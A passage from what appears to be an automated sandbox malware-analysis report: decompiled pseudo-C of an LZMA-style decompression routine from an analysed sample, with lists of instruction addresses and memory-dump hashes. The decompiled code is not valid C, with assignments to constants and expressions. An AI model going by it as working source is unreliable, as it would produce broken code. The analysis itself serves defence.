                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0x10;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t365 = __ebp - 0x70;
                							 *_t365 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t365;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							goto L111;
                						case 0x11:
                							goto L69;
                						case 0x12:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__eax =  *(__ebp - 0x58);
                								 *(__ebp - 0x84) = 0x13;
                								__esi =  *(__ebp - 0x58) + 2;
                								goto L132;
                							}
                							__eax =  *(__ebp - 0x4c);
                							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                							__ecx =  *(__ebp - 0x58);
                							__eax =  *(__ebp - 0x4c) << 4;
                							__eflags = __eax;
                							__eax =  *(__ebp - 0x58) + __eax + 4;
                							goto L130;
                						case 0x13:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								_t469 = __ebp - 0x58;
                								 *_t469 =  *(__ebp - 0x58) + 0x204;
                								__eflags =  *_t469;
                								 *(__ebp - 0x30) = 0x10;
                								 *(__ebp - 0x40) = 8;
                								L144:
                								 *(__ebp - 0x7c) = 0x14;
                								goto L145;
                							}
                							__eax =  *(__ebp - 0x4c);
                							__ecx =  *(__ebp - 0x58);
                							__eax =  *(__ebp - 0x4c) << 4;
                							 *(__ebp - 0x30) = 8;
                							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                							L130:
                							 *(__ebp - 0x58) = __eax;
                							 *(__ebp - 0x40) = 3;
                							goto L144;
                						case 0x14:
                							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                							__eax =  *(__ebp - 0x80);
                							goto L140;
                						case 0x15:
                							__eax = 0;
                							__eflags =  *(__ebp - 0x38) - 7;
                							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                							__al = __al & 0x000000fd;
                							__eax = (__eflags >= 0) - 1 + 0xb;
                							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                							goto L120;
                						case 0x16:
                							__eax =  *(__ebp - 0x30);
                							__eflags = __eax - 4;
                							if(__eax >= 4) {
                								_push(3);
                								_pop(__eax);
                							}
                							__ecx =  *(__ebp - 4);
                							 *(__ebp - 0x40) = 6;
                							__eax = __eax << 7;
                							 *(__ebp - 0x7c) = 0x19;
                							 *(__ebp - 0x58) = __eax;
                							goto L145;
                						case 0x17:
                							L145:
                							__eax =  *(__ebp - 0x40);
                							 *(__ebp - 0x50) = 1;
                							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                							goto L149;
                						case 0x18:
                							L146:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0x18;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t484 = __ebp - 0x70;
                							 *_t484 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t484;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							L148:
                							_t487 = __ebp - 0x48;
                							 *_t487 =  *(__ebp - 0x48) - 1;
                							__eflags =  *_t487;
                							L149:
                							__eflags =  *(__ebp - 0x48);
                							if( *(__ebp - 0x48) <= 0) {
                								__ecx =  *(__ebp - 0x40);
                								__ebx =  *(__ebp - 0x50);
                								0 = 1;
                								__eax = 1 << __cl;
                								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                								__eax =  *(__ebp - 0x7c);
                								 *(__ebp - 0x44) = __ebx;
                								goto L140;
                							}
                							__eax =  *(__ebp - 0x50);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                							__eax =  *(__ebp - 0x58);
                							__esi = __edx + __eax;
                							 *(__ebp - 0x54) = __esi;
                							__ax =  *__esi;
                							__edi = __ax & 0x0000ffff;
                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                							__eflags =  *(__ebp - 0xc) - __ecx;
                							if( *(__ebp - 0xc) >= __ecx) {
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                								__cx = __ax;
                								__cx = __ax >> 5;
                								__eax = __eax - __ecx;
                								__edx = __edx + 1;
                								__eflags = __edx;
                								 *__esi = __ax;
                								 *(__ebp - 0x50) = __edx;
                							} else {
                								 *(__ebp - 0x10) = __ecx;
                								0x800 = 0x800 - __edi;
                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                								 *__esi = __cx;
                							}
                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                							if( *(__ebp - 0x10) >= 0x1000000) {
                								goto L148;
                							} else {
                								goto L146;
                							}
                						case 0x19:
                							__eflags = __ebx - 4;
                							if(__ebx < 4) {
                								 *(__ebp - 0x2c) = __ebx;
                								L119:
                								_t393 = __ebp - 0x2c;
                								 *_t393 =  *(__ebp - 0x2c) + 1;
                								__eflags =  *_t393;
                								L120:
                								__eax =  *(__ebp - 0x2c);
                								__eflags = __eax;
                								if(__eax == 0) {
                									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                									goto L170;
                								}
                								__eflags = __eax -  *(__ebp - 0x60);
                								if(__eax >  *(__ebp - 0x60)) {
                									goto L171;
                								}
                								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                								__eax =  *(__ebp - 0x30);
                								_t400 = __ebp - 0x60;
                								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                								__eflags =  *_t400;
                								goto L123;
                							}
                							__ecx = __ebx;
                							__eax = __ebx;
                							__ecx = __ebx >> 1;
                							__eax = __ebx & 0x00000001;
                							__ecx = (__ebx >> 1) - 1;
                							__al = __al | 0x00000002;
                							__eax = (__ebx & 0x00000001) << __cl;
                							__eflags = __ebx - 0xe;
                							 *(__ebp - 0x2c) = __eax;
                							if(__ebx >= 0xe) {
                								__ebx = 0;
                								 *(__ebp - 0x48) = __ecx;
                								L102:
                								__eflags =  *(__ebp - 0x48);
                								if( *(__ebp - 0x48) <= 0) {
                									__eax = __eax + __ebx;
                									 *(__ebp - 0x40) = 4;
                									 *(__ebp - 0x2c) = __eax;
                									__eax =  *(__ebp - 4);
                									__eax =  *(__ebp - 4) + 0x644;
                									__eflags = __eax;
                									L108:
                									__ebx = 0;
                									 *(__ebp - 0x58) = __eax;
                									 *(__ebp - 0x50) = 1;
                									 *(__ebp - 0x44) = 0;
                									 *(__ebp - 0x48) = 0;
                									L112:
                									__eax =  *(__ebp - 0x40);
                									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                										_t391 = __ebp - 0x2c;
                										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                										__eflags =  *_t391;
                										goto L119;
                									}
                									__eax =  *(__ebp - 0x50);
                									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                									__eax =  *(__ebp - 0x58);
                									__esi = __edi + __eax;
                									 *(__ebp - 0x54) = __esi;
                									__ax =  *__esi;
                									__ecx = __ax & 0x0000ffff;
                									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                									__eflags =  *(__ebp - 0xc) - __edx;
                									if( *(__ebp - 0xc) >= __edx) {
                										__ecx = 0;
                										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                										__ecx = 1;
                										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                										__ebx = 1;
                										__ecx =  *(__ebp - 0x48);
                										__ebx = 1 << __cl;
                										__ecx = 1 << __cl;
                										__ebx =  *(__ebp - 0x44);
                										__ebx =  *(__ebp - 0x44) | __ecx;
                										__cx = __ax;
                										__cx = __ax >> 5;
                										__eax = __eax - __ecx;
                										__edi = __edi + 1;
                										__eflags = __edi;
                										 *(__ebp - 0x44) = __ebx;
                										 *__esi = __ax;
                										 *(__ebp - 0x50) = __edi;
                									} else {
                										 *(__ebp - 0x10) = __edx;
                										0x800 = 0x800 - __ecx;
                										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                										 *__esi = __dx;
                									}
                									__eflags =  *(__ebp - 0x10) - 0x1000000;
                									if( *(__ebp - 0x10) >= 0x1000000) {
                										L111:
                										_t368 = __ebp - 0x48;
                										 *_t368 =  *(__ebp - 0x48) + 1;
                										__eflags =  *_t368;
                										goto L112;
                									} else {
                										goto L109;
                									}
                								}
                								__ecx =  *(__ebp - 0xc);
                								__ebx = __ebx + __ebx;
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                								 *(__ebp - 0x44) = __ebx;
                								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                									__ecx =  *(__ebp - 0x10);
                									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                									__ebx = __ebx | 0x00000001;
                									__eflags = __ebx;
                									 *(__ebp - 0x44) = __ebx;
                								}
                								__eflags =  *(__ebp - 0x10) - 0x1000000;
                								if( *(__ebp - 0x10) >= 0x1000000) {
                									L101:
                									_t338 = __ebp - 0x48;
                									 *_t338 =  *(__ebp - 0x48) - 1;
                									__eflags =  *_t338;
                									goto L102;
                								} else {
                									goto L99;
                								}
                							}
                							__edx =  *(__ebp - 4);
                							__eax = __eax - __ebx;
                							 *(__ebp - 0x40) = __ecx;
                							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                							goto L108;
                						case 0x1a:
                							L56:
                							__eflags =  *(__ebp - 0x64);
                							if( *(__ebp - 0x64) == 0) {
                								 *(__ebp - 0x88) = 0x1a;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x68);
                							__al =  *(__ebp - 0x5c);
                							__edx =  *(__ebp - 8);
                							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                							 *( *(__ebp - 0x68)) = __al;
                							__ecx =  *(__ebp - 0x14);
                							 *(__ecx +  *(__ebp - 8)) = __al;
                							__eax = __ecx + 1;
                							__edx = 0;
                							_t192 = __eax %  *(__ebp - 0x74);
                							__eax = __eax /  *(__ebp - 0x74);
                							__edx = _t192;
                							goto L79;
                						case 0x1b:
                							goto L75;
                						case 0x1c:
                							while(1) {
                								L123:
                								__eflags =  *(__ebp - 0x64);
                								if( *(__ebp - 0x64) == 0) {
                									break;
                								}
                								__eax =  *(__ebp - 0x14);
                								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                								__eflags = __eax -  *(__ebp - 0x74);
                								if(__eax >=  *(__ebp - 0x74)) {
                									__eax = __eax +  *(__ebp - 0x74);
                									__eflags = __eax;
                								}
                								__edx =  *(__ebp - 8);
                								__cl =  *(__eax + __edx);
                								__eax =  *(__ebp - 0x14);
                								 *(__ebp - 0x5c) = __cl;
                								 *(__eax + __edx) = __cl;
                								__eax = __eax + 1;
                								__edx = 0;
                								_t414 = __eax %  *(__ebp - 0x74);
                								__eax = __eax /  *(__ebp - 0x74);
                								__edx = _t414;
                								__eax =  *(__ebp - 0x68);
                								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                								__eflags =  *(__ebp - 0x30);
                								 *( *(__ebp - 0x68)) = __cl;
                								 *(__ebp - 0x14) = _t414;
                								if( *(__ebp - 0x30) > 0) {
                									continue;
                								} else {
                									goto L80;
                								}
                							}
                							 *(__ebp - 0x88) = 0x1c;
                							goto L170;
                					}
                				}
                			}













                0x00406776
                0x0040677a
                0x00406798
                0x00406798
                0x00406798
                0x0040679f
                0x004067a6
                0x004067ad
                0x004067ad
                0x00000000
                0x004067ad
                0x0040677c
                0x0040677f
                0x00406782
                0x00406785
                0x0040678c
                0x004066d0
                0x004066d0
                0x004066d3
                0x00000000
                0x00000000
                0x00406867
                0x0040686a
                0x00000000
                0x00000000
                0x004064a1
                0x004064a3
                0x004064aa
                0x004064ab
                0x004064ad
                0x004064b0
                0x00000000
                0x00000000
                0x004064b8
                0x004064bb
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c2
                0x004064c3
                0x004064c6
                0x004064cd
                0x004064d0
                0x004064de
                0x00000000
                0x00000000
                0x004067b4
                0x004067b4
                0x004067b7
                0x004067be
                0x00000000
                0x00000000
                0x004067c3
                0x004067c3
                0x004067c7
                0x004068ff
                0x00000000
                0x004068ff
                0x004067cd
                0x004067d0
                0x004067d3
                0x004067d7
                0x004067da
                0x004067e0
                0x004067e2
                0x004067e2
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067eb
                0x004067eb
                0x004067ef
                0x0040684f
                0x00406852
                0x00406857
                0x00406858
                0x0040685a
                0x0040685c
                0x0040685f
                0x00000000
                0x0040685f
                0x004067f1
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406800
                0x00406803
                0x00406806
                0x00406809
                0x0040680c
                0x0040680f
                0x00406812
                0x0040682b
                0x0040682e
                0x00406831
                0x00406834
                0x00406838
                0x0040683a
                0x0040683a
                0x0040683b
                0x0040683e
                0x00406814
                0x00406814
                0x0040681c
                0x00406821
                0x00406823
                0x00406826
                0x00406826
                0x00406841
                0x00406848
                0x00000000
                0x0040684a
                0x00000000
                0x0040684a
                0x00000000
                0x004064e6
                0x004064e9
                0x0040651f
                0x0040664f
                0x0040664f
                0x0040664f
                0x0040664f
                0x00406652
                0x00406652
                0x00406655
                0x00406657
                0x004068e1
                0x00000000
                0x004068e1
                0x0040665d
                0x00406660
                0x00000000
                0x00000000
                0x00406666
                0x0040666a
                0x0040666d
                0x0040666d
                0x0040666d
                0x00000000
                0x0040666d
                0x004064eb
                0x004064ed
                0x004064ef
                0x004064f1
                0x004064f4
                0x004064f5
                0x004064f7
                0x004064f9
                0x004064fc
                0x004064ff
                0x00406515
                0x0040651a
                0x00406552
                0x00406552
                0x00406556
                0x00406582
                0x00406584
                0x0040658b
                0x0040658e
                0x00406591
                0x00406591
                0x00406596
                0x00406596
                0x00406598
                0x0040659b
                0x004065a2
                0x004065a5
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x0040664c
                0x0040664c
                0x0040664c
                0x00000000
                0x0040664c
                0x004065da
                0x004065e0
                0x004065e3
                0x004065e6
                0x004065e9
                0x004065ec
                0x004065ef
                0x004065f2
                0x004065f5
                0x004065f8
                0x004065fb
                0x00406614
                0x00406616
                0x00406619
                0x0040661a
                0x0040661d
                0x0040661f
                0x00406622
                0x00406624
                0x00406626
                0x00406629
                0x0040662b
                0x0040662e
                0x00406632
                0x00406634
                0x00406634
                0x00406635
                0x00406638
                0x0040663b
                0x004065fd
                0x004065fd
                0x00406605
                0x0040660a
                0x0040660c
                0x0040660f
                0x0040660f
                0x0040663e
                0x00406645
                0x004065cf
                0x004065cf
                0x004065cf
                0x004065cf
                0x00000000
                0x00406647
                0x00000000
                0x00406647
                0x00406645
                0x00406558
                0x0040655b
                0x0040655d
                0x00406560
                0x00406563
                0x00406566
                0x00406568
                0x0040656b
                0x0040656e
                0x0040656e
                0x00406571
                0x00406571
                0x00406574
                0x0040657b
                0x0040654f
                0x0040654f
                0x0040654f
                0x0040654f
                0x00000000
                0x0040657d
                0x00000000
                0x0040657d
                0x0040657b
                0x00406501
                0x00406504
                0x00406506
                0x00406509
                0x00000000
                0x00000000
                0x00406268
                0x00406268
                0x0040626c
                0x004068b1
                0x00000000
                0x004068b1
                0x00406272
                0x00406275
                0x00406278
                0x0040627b
                0x0040627e
                0x00406281
                0x00406284
                0x00406286
                0x00406289
                0x0040628c
                0x0040628f
                0x00406291
                0x00406291
                0x00406291
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406670
                0x00406670
                0x00406670
                0x00406674
                0x00000000
                0x00000000
                0x0040667a
                0x0040667d
                0x00406680
                0x00406683
                0x00406685
                0x00406685
                0x00406685
                0x00406688
                0x0040668b
                0x0040668e
                0x00406691
                0x00406694
                0x00406697
                0x00406698
                0x0040669a
                0x0040669a
                0x0040669a
                0x0040669d
                0x004066a0
                0x004066a3
                0x004066a6
                0x004066a9
                0x004066ad
                0x004066af
                0x004066b2
                0x00000000
                0x004066b4
                0x00000000
                0x004066b4
                0x004066b2
                0x004068e7
                0x00000000
                0x00000000
                0x00405f16

                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 37a6e0cc647a8bcf712af8254647d354cdd6ee6681e937b8812b349d59c70459
                • Instruction ID: fc637cc57031d6fa7fc43ec0fa9912bbb078f827e800a3857ce4fc75fdb5e0f4
                • Opcode Fuzzy Hash: 37a6e0cc647a8bcf712af8254647d354cdd6ee6681e937b8812b349d59c70459
                • Instruction Fuzzy Hash: 00815771D00229CFDF24CFA8C844BADBBB1FB44305F25816AD856BB281D7789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E00406322() {
                				signed int _t539;
                				unsigned short _t540;
                				signed int _t541;
                				void _t542;
                				signed int _t543;
                				signed int _t544;
                				signed int _t573;
                				signed int _t576;
                				signed int _t597;
                				signed int* _t614;
                				void* _t621;
                
                				L0:
                				while(1) {
                					L0:
                					if( *(_t621 - 0x40) != 1) {
                						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                						_t539 =  *(_t621 - 4) + 0x664;
                						 *(_t621 - 0x58) = _t539;
                						goto L68;
                					} else {
                						 *(__ebp - 0x84) = 8;
                						while(1) {
                							L132:
                							 *(_t621 - 0x54) = _t614;
                							while(1) {
                								L133:
                								_t540 =  *_t614;
                								_t597 = _t540 & 0x0000ffff;
                								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                								if( *(_t621 - 0xc) >= _t573) {
                									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                									 *(_t621 - 0x40) = 1;
                									_t541 = _t540 - (_t540 >> 5);
                									 *_t614 = _t541;
                								} else {
                									 *(_t621 - 0x10) = _t573;
                									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                								}
                								if( *(_t621 - 0x10) >= 0x1000000) {
                									goto L139;
                								}
                								L137:
                								if( *(_t621 - 0x6c) == 0) {
                									 *(_t621 - 0x88) = 5;
                									L170:
                									_t576 = 0x22;
                									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                									_t544 = 0;
                									L172:
                									return _t544;
                								}
                								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                								L139:
                								_t542 =  *(_t621 - 0x84);
                								while(1) {
                									 *(_t621 - 0x88) = _t542;
                									while(1) {
                										L1:
                										_t543 =  *(_t621 - 0x88);
                										if(_t543 > 0x1c) {
                											break;
                										}
                										switch( *((intOrPtr*)(_t543 * 4 +  &M00406926))) {
                											case 0:
                												if( *(_t621 - 0x6c) == 0) {
                													goto L170;
                												}
                												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                												_t543 =  *( *(_t621 - 0x70));
                												if(_t543 > 0xe1) {
                													goto L171;
                												}
                												_t547 = _t543 & 0x000000ff;
                												_push(0x2d);
                												asm("cdq");
                												_pop(_t578);
                												_push(9);
                												_pop(_t579);
                												_t617 = _t547 / _t578;
                												_t549 = _t547 % _t578 & 0x000000ff;
                												asm("cdq");
                												_t612 = _t549 % _t579 & 0x000000ff;
                												 *(_t621 - 0x3c) = _t612;
                												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                												_t620 = (0x300 << _t612 + _t617) + 0x736;
                												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                													L10:
                													if(_t620 == 0) {
                														L12:
                														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                														goto L15;
                													} else {
                														goto L11;
                													}
                													do {
                														L11:
                														_t620 = _t620 - 1;
                														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                													} while (_t620 != 0);
                													goto L12;
                												}
                												if( *(_t621 - 4) != 0) {
                													GlobalFree( *(_t621 - 4));
                												}
                												_t543 = GlobalAlloc(0x40, 0x600); // executed
                												 *(_t621 - 4) = _t543;
                												if(_t543 == 0) {
                													goto L171;
                												} else {
                													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                													goto L10;
                												}
                											case 1:
                												L13:
                												__eflags =  *(_t621 - 0x6c);
                												if( *(_t621 - 0x6c) == 0) {
                													 *(_t621 - 0x88) = 1;
                													goto L170;
                												}
                												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                												_t45 = _t621 - 0x48;
                												 *_t45 =  *(_t621 - 0x48) + 1;
                												__eflags =  *_t45;
                												L15:
                												if( *(_t621 - 0x48) < 4) {
                													goto L13;
                												}
                												_t555 =  *(_t621 - 0x40);
                												if(_t555 ==  *(_t621 - 0x74)) {
                													L20:
                													 *(_t621 - 0x48) = 5;
                													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                													goto L23;
                												}
                												 *(_t621 - 0x74) = _t555;
                												if( *(_t621 - 8) != 0) {
                													GlobalFree( *(_t621 - 8));
                												}
                												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                												 *(_t621 - 8) = _t543;
                												if(_t543 == 0) {
                													goto L171;
                												} else {
                													goto L20;
                												}
                											case 2:
                												L24:
                												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                												 *(_t621 - 0x84) = 6;
                												 *(_t621 - 0x4c) = _t562;
                												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                												goto L132;
                											case 3:
                												L21:
                												__eflags =  *(_t621 - 0x6c);
                												if( *(_t621 - 0x6c) == 0) {
                													 *(_t621 - 0x88) = 3;
                													goto L170;
                												}
                												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                												_t67 = _t621 - 0x70;
                												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                												__eflags =  *_t67;
                												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                												L23:
                												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                												if( *(_t621 - 0x48) != 0) {
                													goto L21;
                												}
                												goto L24;
                											case 4:
                												L133:
                												_t540 =  *_t614;
                												_t597 = _t540 & 0x0000ffff;
                												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                												if( *(_t621 - 0xc) >= _t573) {
                													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                													 *(_t621 - 0x40) = 1;
                													_t541 = _t540 - (_t540 >> 5);
                													 *_t614 = _t541;
                												} else {
                													 *(_t621 - 0x10) = _t573;
                													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                												}
                												if( *(_t621 - 0x10) >= 0x1000000) {
                													goto L139;
                												}
                											case 5:
                												goto L137;
                											case 6:
                												__edx = 0;
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__eax =  *(__ebp - 4);
                													__ecx =  *(__ebp - 0x38);
                													 *(__ebp - 0x34) = 1;
                													 *(__ebp - 0x84) = 7;
                													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                													L132:
                													 *(_t621 - 0x54) = _t614;
                													goto L133;
                												}
                												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                												__esi =  *(__ebp - 0x60);
                												__cl = 8;
                												__cl = 8 -  *(__ebp - 0x3c);
                												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                												__ecx =  *(__ebp - 0x3c);
                												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                												__ecx =  *(__ebp - 4);
                												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                												__eflags =  *(__ebp - 0x38) - 4;
                												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                												if( *(__ebp - 0x38) >= 4) {
                													__eflags =  *(__ebp - 0x38) - 0xa;
                													if( *(__ebp - 0x38) >= 0xa) {
                														_t98 = __ebp - 0x38;
                														 *_t98 =  *(__ebp - 0x38) - 6;
                														__eflags =  *_t98;
                													} else {
                														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                													}
                												} else {
                													 *(__ebp - 0x38) = 0;
                												}
                												__eflags =  *(__ebp - 0x34) - __edx;
                												if( *(__ebp - 0x34) == __edx) {
                													__ebx = 0;
                													__ebx = 1;
                													goto L61;
                												} else {
                													__eax =  *(__ebp - 0x14);
